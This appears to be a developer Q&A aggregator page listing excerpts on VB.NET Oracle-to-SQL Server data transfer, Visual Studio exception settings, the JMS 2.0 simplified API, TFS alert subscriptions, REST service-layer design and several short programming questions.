DataRow SQLInsCmd = New OleDb.OleDbCommand With SQLInsCmd .CommandType = CommandType.StoredProcedure .Connection = SqlConn .CommandText = SQLInsProc .Parameters.Add("ReturnValue", OleDb.OleDbType.Integer) .Parameters("ReturnValue").Direction = ParameterDirection.ReturnValue .Parameters.Add("OutPutParam", OleDb.OleDbType.Integer) .Parameters("OutPutParam").Direction = ParameterDirection.Output .Parameters.Add("TrackID", OleDb.OleDbType.VarChar, 70) .Parameters.Add("RelLifeTime", OleDb.OleDbType.TinyInt) .Parameters("RelLifeTime").Direction = ParameterDirection.Input .Parameters.Add("Param1", OleDb.OleDbType.VarChar, 160) .Parameters("Param1").Direction = ParameterDirection.Input .Parameters.Add("TransID", OleDb.OleDbType.VarChar, 70) .Parameters("TransID").Direction = ParameterDirection.Input .Parameters.Add("UID", OleDb.OleDbType.VarChar, 20) .Parameters("UID").Direction = ParameterDirection.Input .Parameters.Add("Param", OleDb.OleDbType.VarChar, 160) .Parameters("Param").Direction = ParameterDirection.Input .Parameters.Add("CheckCredit", OleDb.OleDbType.Integer) .Parameters("CheckCredit").Direction = ParameterDirection.Input .Prepare() End With Catch ex As Exception c.ErrorLog(Now.ToString & "--PrepareSQLInsert: " & ex.Message) End Try End Function Private Function PrepOraDel() As Boolean OraDelCmd = New OleDb.OleDbCommand Try PrepOraDel = False With OraDelCmd .CommandType = CommandType.Text .Connection = OraConn .CommandText = DelSrcSQL .Parameters.Add("P(0)", OleDb.OleDbType.VarChar, 160) 'RowID .Parameters("P(0)").Direction = ParameterDirection.Input .Prepare() End With OraDataAdapter.DeleteCommand = OraDelCmd PrepOraDel = True Catch ex As Exception PrepOraDel = False End Try End Function WHat i would like to know is, if there is anyway to speed up this program? Any ideas/suggestions would be highly appreciated... Regardss, Chetan

    Read the article

  • Fastest way to move records from an Oracle database into SQL Server

    - by user347748
    Ok this is the scenario... I have a table in Oracle that acts like a queue... A VB.net program reads the queue and calls a stored proc in SQL Server that processes and then inserts the message into another SQL Server table and then deletes the record from the oracle table. We use a DataReader to read the records from Oracle and then call the stored proc for each of the records. The program seems to be a little slow. The stored procedure itself isn't slow. The SP by itself when called in a loop can process about 2000 records in 20 seconds. But when called from the .Net program, the execution time is about 5 records per second. I have seen that most of the time consumed is in calling the stored procedure and waiting for it to return. Is there a better way of doing this? Here is a snippet of the actual code Function StartDataXfer() As Boolean Dim status As Boolean = False Try SqlConn.Open() OraConn.Open() c.ErrorLog(Now.ToString & "--Going to Get the messages from oracle", 1) If GetMsgsFromOracle() Then c.ErrorLog(Now.ToString & "--Got messages from oracle", 1) If ProcessMessages() Then c.ErrorLog(Now.ToString & "--Finished Processing all messages in the queue", 0) status = True Else c.ErrorLog(Now.ToString & "--Failed to Process all messages in the queue", 0) status = False End If Else status = True End If StartDataXfer = status Catch ex As Exception Finally SqlConn.Close() OraConn.Close() End Try End Function Private Function GetMsgsFromOracle() As Boolean Try OraDataAdapter = New OleDb.OleDbDataAdapter OraDataTable = New System.Data.DataTable OraSelCmd = New OleDb.OleDbCommand GetMsgsFromOracle = False With OraSelCmd .CommandType = CommandType.Text .Connection = OraConn .CommandText = GetMsgSql End With OraDataAdapter.SelectCommand = OraSelCmd OraDataAdapter.Fill(OraDataTable) If OraDataTable.Rows.Count > 0 Then GetMsgsFromOracle = True End If Catch ex As Exception GetMsgsFromOracle = False End Try End Function Private Function ProcessMessages() As Boolean Try ProcessMessages = False PrepareSQLInsert() PrepOraDel() i = 0 Dim Method As Integer Dim OraDataRow As DataRow c.ErrorLog(Now.ToString & "--Going to call message sending procedure", 2) For Each OraDataRow In OraDataTable.Rows With OraDataRow Method = GetMethod(.Item(0)) SQLInsCmd.Parameters("RelLifeTime").Value = c.RelLifetime SQLInsCmd.Parameters("Param1").Value = Nothing SQLInsCmd.Parameters("ID").Value = GenerateTransactionID() ' Nothing SQLInsCmd.Parameters("UID").Value = Nothing SQLInsCmd.Parameters("Param").Value = Nothing SQLInsCmd.Parameters("Credit").Value = 0 SQLInsCmd.ExecuteNonQuery() 'check the return value If SQLInsCmd.Parameters("ReturnValue").Value = 1 And SQLInsCmd.Parameters("OutPutParam").Value = 0 Then 'success 'delete the input record from the source table once it is logged c.ErrorLog(Now.ToString & "--Moved record successfully", 2) OraDataAdapter.DeleteCommand.Parameters("P(0)").Value = OraDataRow.Item(6) OraDataAdapter.DeleteCommand.ExecuteNonQuery() c.ErrorLog(Now.ToString & "--Deleted record successfully", 2) OraDataAdapter.Update(OraDataTable) c.ErrorLog(Now.ToString & "--Committed record successfully", 2) i = i + 1 Else 'failure c.ErrorLog(Now.ToString & "--Failed to exec: " & c.DestIns & "Status: " & SQLInsCmd.Parameters("OutPutParam").Value & " and TrackId: " & SQLInsCmd.Parameters("TrackID").Value.ToString, 0) End If If File.Exists("stop.txt") Then c.ErrorLog(Now.ToString & "--Stop File Found", 1) 'ProcessMessages = True 'Exit Function Exit For End If End With Next OraDataAdapter.Update(OraDataTable) c.ErrorLog(Now.ToString & "--Updated Oracle Table", 1) c.ErrorLog(Now.ToString & "--Moved " & i & " records from Oracle to SQL Table", 1) ProcessMessages = True Catch ex As Exception ProcessMessages = False c.ErrorLog(Now.ToString & "--MoveMsgsToSQL: " & ex.Message, 0) Finally OraDataTable.Clear() OraDataTable.Dispose() OraDataAdapter.Dispose() OraDelCmd.Dispose() OraDelCmd = Nothing OraSelCmd = Nothing OraDataTable = Nothing OraDataAdapter = Nothing End Try End Function Public Function GenerateTransactionID() As Int64 Dim SeqNo As Int64 Dim qry As String Dim SqlTransCmd As New OleDb.OleDbCommand qry = " select seqno from StoreSeqNo" SqlTransCmd.CommandType = CommandType.Text SqlTransCmd.Connection = SqlConn SqlTransCmd.CommandText = qry SeqNo = SqlTransCmd.ExecuteScalar If SeqNo > 2147483647 Then qry = "update StoreSeqNo set seqno=1" SqlTransCmd.CommandText = qry SqlTransCmd.ExecuteNonQuery() GenerateTransactionID = 1 Else qry = "update StoreSeqNo set seqno=" & SeqNo + 1 SqlTransCmd.CommandText = qry SqlTransCmd.ExecuteNonQuery() GenerateTransactionID = SeqNo End If End Function Private Function PrepareSQLInsert() As Boolean 'function to prepare the insert statement for the insert into the SQL stmt using 'the sql procedure SMSProcessAndDispatch Try Dim dr As DataRow SQLInsCmd = New OleDb.OleDbCommand With SQLInsCmd .CommandType = CommandType.StoredProcedure .Connection = SqlConn .CommandText = SQLInsProc .Parameters.Add("ReturnValue", OleDb.OleDbType.Integer) .Parameters("ReturnValue").Direction = ParameterDirection.ReturnValue .Parameters.Add("OutPutParam", OleDb.OleDbType.Integer) .Parameters("OutPutParam").Direction = ParameterDirection.Output .Parameters.Add("TrackID", OleDb.OleDbType.VarChar, 70) .Parameters.Add("RelLifeTime", OleDb.OleDbType.TinyInt) .Parameters("RelLifeTime").Direction = ParameterDirection.Input .Parameters.Add("Param1", OleDb.OleDbType.VarChar, 160) .Parameters("Param1").Direction = ParameterDirection.Input .Parameters.Add("TransID", OleDb.OleDbType.VarChar, 70) .Parameters("TransID").Direction = ParameterDirection.Input .Parameters.Add("UID", OleDb.OleDbType.VarChar, 20) .Parameters("UID").Direction = ParameterDirection.Input .Parameters.Add("Param", OleDb.OleDbType.VarChar, 160) .Parameters("Param").Direction = ParameterDirection.Input .Parameters.Add("CheckCredit", OleDb.OleDbType.Integer) .Parameters("CheckCredit").Direction = ParameterDirection.Input .Prepare() End With Catch ex As Exception c.ErrorLog(Now.ToString & "--PrepareSQLInsert: " & ex.Message) End Try End Function Private Function PrepOraDel() As Boolean OraDelCmd = New OleDb.OleDbCommand Try PrepOraDel = False With OraDelCmd .CommandType = CommandType.Text .Connection = OraConn .CommandText = DelSrcSQL .Parameters.Add("P(0)", OleDb.OleDbType.VarChar, 160) 'RowID .Parameters("P(0)").Direction = ParameterDirection.Input .Prepare() End With OraDataAdapter.DeleteCommand = OraDelCmd PrepOraDel = True Catch ex As Exception PrepOraDel = False End Try End Function WHat i would like to know is, if there is anyway to speed up this program? Any ideas/suggestions would be highly appreciated... Regardss, Chetan

    Read the article

  • Visual Studio Exceptions dialogs

    - by Daniel Moth
    Previously I covered step 1 of live debugging with start and attach. Once the debugger is attached, you want to go to step 2 of live debugging, which is to break. One way to break under the debugger is to do nothing, and just wait for an exception to occur in your code. This is true for all types of code that you debug in Visual Studio, and let's consider the following piece of C# code:3: static void Main() 4: { 5: try 6: { 7: int i = 0; 8: int r = 5 / i; 9: } 10: catch (System.DivideByZeroException) {/*gulp. sue me.*/} 11: System.Console.ReadLine(); 12: } If you run this under the debugger do you expect an exception on line 8? It is a trick question: you have to know whether I have configured the debugger to break when exceptions are thrown (first-chance exceptions) or only when they are unhandled. The place you do that is in the Exceptions dialog which is accessible from the Debug->Exceptions menu and on my installation looks like this: Note that I have checked all CLR exceptions. I could have expanded (like shown for the C++ case in my screenshot) and selected specific exceptions. To read more about this dialog, please read the corresponding Exception Handling debugging msdn topic and all its subtopics. So, for the code above, the debugger will break execution due to the thrown exception (exactly as if the try..catch was not there), so I see the following Exception Thrown dialog: Note the following: I can hit continue (or hit break and then later continue) and the program will continue fine since I have a catch handler. If this was an unhandled exception, then that is what the dialog would say (instead of first chance exception) and continuing would crash the app. That hyperlinked text ("Open Exception Settings") opens the Exceptions dialog I described further up. The coolest thing to note is the checkbox - this is new in this latest release of Visual Studio: it is a shortcut to the checkbox in the Exceptions dialog, so you don't have to open it to change this setting for this specific exception - you can toggle that option right from this dialog. Finally, if you try the code above on your system, you may observe a couple of differences from my screenshots. The first is that you may have an additional column of checkboxes in the Exceptions dialog. The second is that the last dialog I shared may look different to you. It all depends on the Debug->Options settings, and the two relevant settings are in this screenshot: The Exception assistant is what configures the look of the UI when the debugger wants to indicate exception to you, and the Just My Code setting controls the extra column in the Exception dialog. You can read more about those options on MSDN: How to break on User-Unhandled exceptions (plus Gregg’s post) and Exception Assistant. Before I leave you to go play with this stuff a bit more, please note that this level of debugging is now available for JavaScript too, and if you are looking at the Exceptions dialog and wondering what the "GPU Memory Access Exceptions" node is about, stay tuned on the C++ AMP blog ;-) Comments about this post by Daniel Moth welcome at the original blog.

    Read the article

  • JMSContext, @JMSDestinationDefintion, DefaultJMSConnectionFactory with simplified JMS API: TOTD #213

    - by arungupta
    "What's New in JMS 2.0" Part 1 and Part 2 provide comprehensive introduction to new messaging features introduced in JMS 2.0. The biggest improvement in JMS 2.0 is introduction of the "new simplified API". This was explained in the Java EE 7 Launch Technical Keynote. You can watch a complete replay here. Sending and Receiving a JMS message using JMS 1.1 requires lot of boilerplate code, primarily because the API was designed 10+ years ago. Here is a code that shows how to send a message using JMS 1.1 API: @Statelesspublic class ClassicMessageSender { @Resource(lookup = "java:comp/DefaultJMSConnectionFactory") ConnectionFactory connectionFactory; @Resource(mappedName = "java:global/jms/myQueue") Queue demoQueue; public void sendMessage(String payload) { Connection connection = null; try { connection = connectionFactory.createConnection(); connection.start(); Session session = connection.createSession(false, Session.AUTO_ACKNOWLEDGE); MessageProducer messageProducer = session.createProducer(demoQueue); TextMessage textMessage = session.createTextMessage(payload); messageProducer.send(textMessage); } catch (JMSException ex) { ex.printStackTrace(); } finally { if (connection != null) { try { connection.close(); } catch (JMSException ex) { ex.printStackTrace(); } } } }} There are several issues with this code: A JMS ConnectionFactory needs to be created in a application server-specific way before this application can run. Application-specific destination needs to be created in an application server-specific way before this application can run. Several intermediate objects need to be created to honor the JMS 1.1 API, e.g. ConnectionFactory -> Connection -> Session -> MessageProducer -> TextMessage. Everything is a checked exception and so try/catch block must be specified. Connection need to be explicitly started and closed, and that bloats even the finally block. The new JMS 2.0 simplified API code looks like: @Statelesspublic class SimplifiedMessageSender { @Inject JMSContext context; @Resource(mappedName="java:global/jms/myQueue") Queue myQueue; public void sendMessage(String message) { context.createProducer().send(myQueue, message); }} The code is significantly improved from the previous version in the following ways: The JMSContext interface combines in a single object the functionality of both the Connection and the Session in the earlier JMS APIs.  You can obtain a JMSContext object by simply injecting it with the @Inject annotation.  No need to explicitly specify a ConnectionFactory. A default ConnectionFactory under the JNDI name of java:comp/DefaultJMSConnectionFactory is used if no explicit ConnectionFactory is specified. The destination can be easily created using newly introduced @JMSDestinationDefinition as: @JMSDestinationDefinition(name = "java:global/jms/myQueue",        interfaceName = "javax.jms.Queue") It can be specified on any Java EE component and the destination is created during deployment. JMSContext, Session, Connection, JMSProducer and JMSConsumer objects are now AutoCloseable. This means that these resources are automatically closed when they go out of scope. This also obviates the need to explicitly start the connection JMSException is now a runtime exception. Method chaining on JMSProducers allows to use builder patterns. No need to create separate Message object, you can specify the message body as an argument to the send() method instead. Want to try this code ? Download source code! Download Java EE 7 SDK and install. Start GlassFish: bin/asadmin start-domain Build the WAR (in the unzipped source code directory): mvn package Deploy the WAR: bin/asadmin deploy <source-code>/jms/target/jms-1.0-SNAPSHOT.war And access the application at http://localhost:8080/jms-1.0-SNAPSHOT/index.jsp to send and receive a message using classic and simplified API. A replay of JMS 2.0 session from Java EE 7 Launch Webinar provides complete details on what's new in this specification: Enjoy!

    Read the article

  • Doubts about several best practices for rest api + service layer

    - by TheBeefMightBeTough
    I'm going to be starting a project soon that exposes a restful api for business intelligence. It may not be limited to a restful api, so I plan to delegate requests to a service layer that then coordinates multiple domain objects (each of which have business logic local to the object). The api will likely have many calls as it is a long-term project. While thinking about the design, I recalled a few best practices. 1) Use command objects at the controller layer (I'm using Spring MVC). 2) Use DTOs at the service layer. 3) Validate in both the controller and service layer, though for different reasons. I have my doubts about these recommendations. 1) Using command objects adds a lot of extra single-purpose classes (potentially one per request). What exactly is the benefit? Annotation based validation can be done using this approach, sure. What if I have two requests that take the same parameters, but have different validation requirements? I would have to have two different classes with exactly the same members but different annotations? Bleh. 2) I have heard that using DTOs is preferable to parameters because it makes for more maintainable code down the road (say, e.g., requirements change and the service parameters need to be altered). I don't quite understand this. Shouldn't an api be more-or-less set in stone? I would understand that in the early phases of a project (or, especially, an entire company) the domain itself will not be well understood, and thus core domain objects may change along with the apis that manipulate these objects. At this point however the number of api methods should be small and their dependents few, so changes to the methods could easily be tolerated from a maintainability standpoint. In a large api with many methods and a substantial domain model, I would think having a DTO for potentially each domain object would become unwieldy. Am I misunderstanding something here? 3) I see validation in the controller and service layer as redundant in most cases. Why would I validate that parameters are not null and are in general well formed in the controller if the service is going to do exactly the same (and more). Couldn't I just do all the validation in the service and throw a runtime exception with a list of bad parameters then catch that in the controller to make the error messages more presentable? Better yet, couldn't I just make the error messages user-friendly in the service and let the exception trickle up to a global handler (ControllerAdvice in spring, for example)? Is there something wrong with either of these approaches? (I do see a use case for controller validation if the input does not map one-to-one with the service input, but since the controllers are for a rest api and not forms, the api parameters will probably map directly to service parameters.) I do also have a question about unchecked vs checked exceptions. Namely, I'm not really sure why I'd ever want to use a checked exception. Every time I have seen them used they just get wrapped into general exceptions (DomainException, SystemException, ApplicationException, w/e) to reduce the signature length of methods, or devs catch Exception rather than dealing with the App1Exception, App2Exception, Sys1Exception, Sys2Exception. I don't see how either of these practices is very useful. Why not just use unchecked exceptions always and catch the ones you actually do care about? You could just document what unchecked exceptions the method throws.

    Read the article

  • Criminals and Other Illegal Characters

    - by Most Valuable Yak (Rob Volk)
    SQLTeam's favorite Slovenian blogger Mladen (b | t) had an interesting question on Twitter: http://www.twitter.com/MladenPrajdic/status/347057950470307841 I liked Kendal Van Dyke's (b | t) reply: http://twitter.com/SQLDBA/status/347058908801667072 And he was right!  This is one of those pretty-useless-but-sounds-interesting propositions that I've based all my presentations on, and most of my blog posts. If you read all the replies you'll see a lot of good suggestions.  I particularly like Aaron Bertrand's (b | t) idea of going into the Unicode character set, since there are over 65,000 characters available.  But how to find an illegal character?  Detective work? I'm working on the premise that if SQL Server will reject it as a name it would throw an error.  So all we have to do is generate all Unicode characters, rename a database with that character, and catch any errors. It turns out that dynamic SQL can lend a hand here: IF DB_ID(N'a') IS NULL CREATE DATABASE [a]; DECLARE @c INT=1, @sql NVARCHAR(MAX)=N'', @err NVARCHAR(MAX)=N''; WHILE @c<65536 BEGIN BEGIN TRY SET @sql=N'alter database ' + QUOTENAME(CASE WHEN @c=1 THEN N'a' ELSE NCHAR(@c-1) END) + N' modify name=' + QUOTENAME(NCHAR(@c)); RAISERROR(N'*** Trying %d',10,1,@c) WITH NOWAIT; EXEC(@sql); SET @c+=1; END TRY BEGIN CATCH SET @err=ERROR_MESSAGE(); RAISERROR(N'Ooops - %d - %s',10,1,@c,@err) WITH NOWAIT; BREAK; END CATCH END SET @sql=N'alter database ' + QUOTENAME(NCHAR(@c-1)) + N' modify name=[a]'; EXEC(@sql); The script creates a dummy database "a" if it doesn't already exist, and only tests single characters as a database name.  If you have databases with single character names then you shouldn't run this on that server. It takes a few minutes to run, but if you do you'll see that no errors are thrown for any of the characters.  It seems that SQL Server will accept any character, no matter where they're from.  (Well, there's one, but I won't tell you which. Actually there's 2, but one of them requires some deep existential thinking.) The output is also interesting, as quite a few codes do some weird things there.  I'm pretty sure it's due to the font used in SSMS for the messages output window, not all characters are available.  If you run it using the SQLCMD utility, and use the -o switch to output to a file, and -u for Unicode output, you can open the file in Notepad or another text editor and see the whole thing. I'm not sure what character I'd recommend to answer Mladen's question.  I think the standard tab (ASCII 9) is fine.  There's also several specific separator characters in the original ASCII character set (decimal 28-31). But of all the choices available in Unicode whitespace, I think my favorite would be the Mongolian Vowel Separator.  Or maybe the zero-width space. (that'll be fun to print!)  And since this is Mladen we're talking about, here's a good selection of "intriguing" characters he could use.

    Read the article

  • TFS 2012 API Create Alert Subscriptions

    - by Bob Hardister
    Originally posted on: http://geekswithblogs.net/BobHardister/archive/2013/07/24/tfs-2012-api-create-alert-subscriptions.aspxThere were only a few post on this and I felt like really important information was left out: What the defaults are How to create the filter string Here’s the code to create the subscription. Get the Collection public TfsTeamProjectCollection GetCollection(string collectionUrl) { try { //connect to the TFS collection using the active user TfsTeamProjectCollection tpc = new TfsTeamProjectCollection(new Uri(collectionUrl)); tpc.EnsureAuthenticated(); return tpc; } catch (Exception) { return null; } } Use Impersonation Because my app is used to create “support tickets” as stories in TFS, I use impersonation so the subscription is setup for the “requester.”  That way I can take all the defaults for the subscription delivery preferences. public TfsTeamProjectCollection GetCollectionImpersonation(string collectionUrl, string impersonatingUserAccount) { // see: http://blogs.msdn.com/b/taylaf/archive/2009/12/04/introducing-tfs-impersonation.aspx try { TfsTeamProjectCollection tpc = GetCollection(collectionUrl); if (!(tpc == null)) { //get the TFS identity management service (v2 is 2012 only) IIdentityManagementService2 ims = tpc.GetService<IIdentityManagementService2>(); //look up the user we want to impersonate TeamFoundationIdentity identity = ims.ReadIdentity(IdentitySearchFactor.AccountName, impersonatingUserAccount, MembershipQuery.None, ReadIdentityOptions.None); //create a new connection using the impersonated user account //note: do not ensure authentication because the impersonated user may not have //windows authentication at execution if (!(identity == null)) { TfsTeamProjectCollection itpc = new TfsTeamProjectCollection(tpc.Uri, identity.Descriptor); return itpc; } else { //the user account is not found return null; } } else { return null; } } catch (Exception) { return null; } } Create the Alert Subscription public bool SetWiAlert(string collectionUrl, string projectName, int wiId, string emailAddress, string userAccount) { bool setSuccessful = false; try { //use impersonation so the event service creating the subscription will default to //the correct account: otherwise domain ambiguity could be a problem TfsTeamProjectCollection itpc = GetCollectionImpersonation(collectionUrl, userAccount); if (!(itpc == null)) { IEventService es = itpc.GetService(typeof(IEventService)) as IEventService; DeliveryPreference deliveryPreference = new DeliveryPreference(); //deliveryPreference.Address = emailAddress; deliveryPreference.Schedule = DeliverySchedule.Immediate; deliveryPreference.Type = DeliveryType.EmailHtml; //the following line does not work for two reasons: //string filter = string.Format("\"ID\" = '{0}' AND \"Authorized As\" <> '[Me]'", wiId); //1. the create fails because there is a space between Authorized As //2. the explicit query criteria are all incorrect anyway // see uncommented line for what does work: you have to create the subscription mannually // and then get it to view what the filter string needs to be (see following commented code) //this works string filter = string.Format("\"CoreFields/IntegerFields/Field[Name='ID']/NewValue\" = '12175'" + " AND \"CoreFields/StringFields/Field[Name='Authorized As']/NewValue\"" + " <> '@@MyDisplayName@@'", projectName, wiId); string eventName = string.Format("<PT N=\"ALM Ticket for Work Item {0}\"/>", wiId); es.SubscribeEvent("WorkItemChangedEvent", filter, deliveryPreference, eventName); ////use this code to get existing subscriptions: you can look at manually created ////subscriptions to see what the filter string needs to be //IIdentityManagementService2 ims = itpc.GetService<IIdentityManagementService2>(); //TeamFoundationIdentity identity = ims.ReadIdentity(IdentitySearchFactor.AccountName, // userAccount, // MembershipQuery.None, // ReadIdentityOptions.None); //var existingsubscriptions = es.GetEventSubscriptions(identity.Descriptor); setSuccessful = true; return setSuccessful; } else { return setSuccessful; } } catch (Exception) { return setSuccessful; } }

    Read the article

  • Google Ajax search API

    - by jAndy
    Hi Folks, I'm wondering, is it possible to receive google results over their own ajax API in a way like, 100 results per page? Without a visible search field, I'd like to get the results in the background to create a progression for some search phrases. My basic question is, what are the restrictions of the google search api ? Kind Regards --Andy

    Read the article

  • What are your favorite "yak shaving" euphemisms?

    - by dacracot
    Noun yak shaving (uncountable) (idiomatic) Any apparently useless activity which, by allowing you to overcome intermediate difficulties, allows you to solve a larger problem. I was doing a bit of yak shaving this morning, and it looks like it might have paid off. So I'm after phrases like "yak shaving" that mean something to the developer community that non-developers don't understand. Not anecdotes.

    Read the article

  • Lucene Fuzzy Match on Phrase instead of Single Word

    - by Koobz
    I'm trying to do a fuzzy match on the Phrase "Grand Prarie" (deliberately misspelled) using Apache Lucene. Part of my issue is that the ~ operator only does fuzzy matches on single word terms and behaves as a proximity match for phrases. Is there a way to do a fuzzy match on a phrase with lucene?

    Read the article

  • How to target specific letter/word with jquery?

    - by Gal
    As a mere example, I want to apply the class "fancy" to all occurrences of the sign "&" in the document. The CSS: .fancy { font-style: italic; } So a text that looks like this: Ben & Jerry's would be manipulated by jquery to this: Ben <span class="fancy">&</span> Jerry's Is there a function to target specific words/phrases/letters like this?

    Read the article

  • Change Variable back to original value after Regex matching.

    - by Brad Johansen
    I just "finished" expanding my Palindrome Tester, made in C#. To allow for phrases I added a simple regex match for all non-alphanumeric characters. At the end of the program it states " is(n't) a palindrome." But now with the regex it prints the no spaces/punctuation version of it. I would like to be able to print the original user input. How do I do that? Here is my program: http://gist.github.com/384565

    Read the article

  • Compose synthetic English phrase that would contain 160 bits of recoverable information

    - by Alexander Gladysh
    I have 160 bits of random data. Just for fun, I want to generate pseudo-English phrase to "store" this information in. I want to be able to recover this information from the phrase. Note: This is not a security question, I don't care if someone else will be able to recover the information or even detect that it is there or not. Criteria for better phrases, from most important to the least: Short Unique Natural-looking The current approach, suggested here: Take three lists of 1024 nouns, verbs and adjectives each (picking most popular ones). Generate a phrase by the following pattern, reading 20 bits for each word: Noun verb adjective verb, Noun verb adjective verb, Noun verb adjective verb, Noun verb adjective verb. Now, this seems to be a good approach, but the phrase is a bit too long and a bit too dull. I have found a corpus of words here (Part of Speech Database). After some ad-hoc filtering, I calculated that this corpus contains, approximately 50690 usable adjectives 123585 nouns 15301 verbs This allows me to use up to 16 bits per adjective (actually 16.9, but I can't figure how to use fractional bits) 15 bits per noun 13 bits per verb For noun-verb-adjective-verb pattern this gives 57 bits per "sentence" in phrase. This means that, if I'll use all words I can get from this corpus, I can generate three sentences instead of four (160 / 57 ˜ 2.8). Noun verb adjective verb, Noun verb adjective verb, Noun verb adjective verb. Still a bit too long and dull. Any hints how can I improve it? What I see that I can try: Try to compress my data somehow before encoding. But since the data is completely random, only some phrases would be shorter (and, I guess, not by much). Improve phrase pattern, so it would look better. Use several patterns, using the first word in phrase to somehow indicate for future decoding which pattern was used. (For example, use the last letter or even the length of the word.) Pick pattern according to the first bytes of the data. ...I'm not that good with English to come up with better phrase patterns. Any suggestions? Use more linguistics in the pattern. Different tenses etc. ...I guess, I would need much better word corpus than I have now for that. Any hints where can I get a suitable one?

    Read the article

  • How do I Store / Access Translations Efficiently?

    - by Gilbert
    I am trying to translate some of the phrases of my website into various languages. so, in my database, I have a table with rows of ID//text//dest_language//text_in_dest_language At the moment, I retreive each translation one by one: get text_in_dest_language where text="Hello World" and dest_languge="zh" This results in 40-50 db calls per page, which, on the app engine, is rather slow. What can I do to mitigate this slowdown?

    Read the article

  • Ideas for designing an automated content tagging system needed

    - by Benjamin Smith
    I am currently designing a website that amongst other is required to display and organise small amounts of text content (mainly quotes, article stubs, etc.). I currently have a database with 250,000+ items and need to come up with a method of tagging each item with relevant tags which will eventually allow for easy searching/browsing of the content for users. A very simplistic idea I have (and one that I believe is employed by some sites that I have been looking to for inspiration (http://www.brainyquote.com/quotes/topics.html)), is to simply search the database for certain words or phrases and use these words as tags for the content. This can easily be extended so that if for example a user wanted to show all items with a theme of love then I would just return a list of items with words and phrases relating to this theme. This would not be hard to implement but does not provide very good results. For example if I were to search for the month 'May' in the database with the aim of then classifying the items returned as realting to the topic of Spring then I would get back all occurrences of the word May, regardless of the semantic meaning. Another shortcoming of this method is that I believe it would be quite hard to automate the process to any large scale. What I really require is a library that can take an item, break it down and analyse the semantic meaning and also return a list of tags that would correctly classify the item. I know this is a lot to ask and I have a feeling I will end up reverting to the aforementioned method but I just thought I should ask if anyone knew of any pre-existing solution. I think that as the items in the database are short then it is probably quite a hard task to analyse any meaning from them however I may be mistaken. Another path to possibly go down would be to use something like amazon turk to outsource the task which may produce good results but would be expensive. Eventually I would like users to be able to (and want to!) tag content and to vote for the most relevant tags, possibly using a gameification mechanic as motivation however this is some way down the line. A temporary fix may be the best thing if this were the route I decided to go down as I could use the rough results I got as the starting point for a more in depth solution. If you've read this far, thanks for sticking with me, I know I'm spitballing but any input would be really helpful. Thanks.

    Read the article

< Previous Page | 39 40 41 42 43 44 45 46 47 48 49 50  | Next Page >